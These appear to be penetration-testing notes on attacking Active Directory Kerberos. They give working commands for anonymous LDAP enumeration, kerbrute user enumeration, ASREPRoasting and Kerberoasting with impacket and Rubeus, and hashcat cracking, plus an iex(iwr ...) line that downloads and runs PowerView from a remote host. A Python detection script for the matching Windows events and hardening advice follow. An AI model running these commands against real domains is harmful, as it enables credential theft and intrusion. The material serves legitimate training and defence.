Kerberos
Kerberos is the authentication protocol used by Active Directory, which exposes its directory over LDAP. When these services are reachable, we can test for anonymous LDAP binds, enumerate users through them, and perform the Kerberos attacks described below.
Anonymous Binds
When the LDAP and Kerberos ports are open, it is always good practice to check for anonymous binds. When anonymous binds are enabled, we can query the directory for user accounts and their attributes. Sysadmins sometimes leave a user's password in the account's description field, which is a quick win if anonymous binds are enabled.
ldapsearch -h $ip -x -s base namingcontexts
ldapsearch -h $ip -x -b "DC=domain,DC=tld" > ldap-anonymous
ldapsearch -h $ip -x -b "DC=domain,DC=tld" '(objectClass=person)' > ldap-people
Machine: Cascade
Kerberos Attacks
ASREPRoasting
Enumerate as many user names as possible (from LDAP, web pages, document metadata, and similar sources).
With the names collected, generate candidate username formats with username-anarchy.
Then check which candidates are valid accounts with kerbrute.
kerbrute userenum -d domain.tld usernames.txt | tee kerb.out
# users.txt -> the username@domain.tld entries taken from kerb.out
Once the valid usernames are identified, perform ASREPRoasting:
impacket-GetNPUsers -usersfile users.txt -dc-ip $ip domain.tld/ -outputfile getnpusers.txt
With the obtained hash, the user's password can be recovered by cracking it with hashcat or john:
hashcat -m 18200 getnpusers.txt /usr/share/wordlists/rockyou.txt
Kerberoasting
From Linux
impacket-GetUserSPNs domain.tld/username:password@$ip -dc-ip $ip -request -outputfile kerberoasting.hash
From Windows
# With PowerView: load it in memory and list the accounts that have an SPN set
iex(iwr -uri http://10.10.10.29/PowerView.ps1 -usebasicparsing)
Get-NetUser -SPN
# Rubeus
.\Rubeus.exe kerberoast /outfile:kerberoasting.hash
Cracking
hashcat -m 13100 kerberoasting.hash /usr/share/wordlists/rockyou.txt
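To see the same activity from the blue side, here is an added detection example (not part of the original notes) run over constructed Windows Security events: 4768 TGT requests with PreAuthType 0 reveal the accounts GetNPUsers would find, and 4769 service-ticket requests with RC4 (0x17) for user SPN accounts are the trace a Kerberoast run leaves. The record layout (one dict per event with these field names) is an assumption about how the log was exported.

```python
"""Flag Kerberos ticket-request events matching the roasting patterns above.
Added example, not part of the original notes; the sample events are constructed
and the dict field names are an assumed export format of Security log events
(4768 = TGT request, 4769 = TGS/service ticket request)."""

# Constructed sample records (assumption: one dict per exported event).
EVENTS = [
    {"id": 4768, "client": "10.0.0.5", "user": "svc_backup", "preauth": 0, "etype": "0x17"},
    {"id": 4768, "client": "10.0.0.9", "user": "alice", "preauth": 2, "etype": "0x12"},
    {"id": 4769, "client": "10.0.0.5", "user": "alice", "service": "svc_sql", "etype": "0x17"},
    {"id": 4769, "client": "10.0.0.5", "user": "alice", "service": "svc_web", "etype": "0x17"},
    {"id": 4769, "client": "10.0.0.5", "user": "alice", "service": "krbtgt", "etype": "0x17"},
    {"id": 4769, "client": "10.0.0.9", "user": "bob", "service": "WS01$", "etype": "0x12"},
    {"id": 4769, "client": "10.0.0.9", "user": "bob", "service": "svc_sql", "etype": "0x12"},
]


def asrep_candidates(events):
    """4768 with PreAuthType 0: a TGT was issued without pre-authentication,
    which is exactly the account state AS-REP roasting depends on."""
    return sorted({e["user"] for e in events if e["id"] == 4768 and e["preauth"] == 0})


def kerberoast_requests(events):
    """4769 with RC4 (0x17) for a user service account: roasting tools ask for RC4
    because it cracks fastest. Machine accounts ($) and krbtgt are excluded."""
    return [e for e in events
            if e["id"] == 4769 and e["etype"].lower() == "0x17"
            and not e["service"].endswith("$")
            and e["service"].lower() != "krbtgt"]


def noisy_clients(events, threshold=2):
    """Clients pulling RC4 service tickets for several distinct SPN accounts:
    a single tool run requests every roastable SPN at once, so the count spikes."""
    per_client = {}
    for e in kerberoast_requests(events):
        per_client.setdefault(e["client"], set()).add(e["service"])
    return {c: sorted(s) for c, s in per_client.items() if len(s) >= threshold}


if __name__ == "__main__":
    print("AS-REP roastable accounts seen:", asrep_candidates(EVENTS))
    print("RC4 service-ticket requests:",
          [(e["client"], e["service"]) for e in kerberoast_requests(EVENTS)])
    print("Clients requesting many RC4 tickets:", noisy_clients(EVENTS))
```

Disabling "Do not require Kerberos preauthentication" on the flagged accounts and replacing RC4-only service accounts with AES keys and long random passwords removes what both attacks rely on.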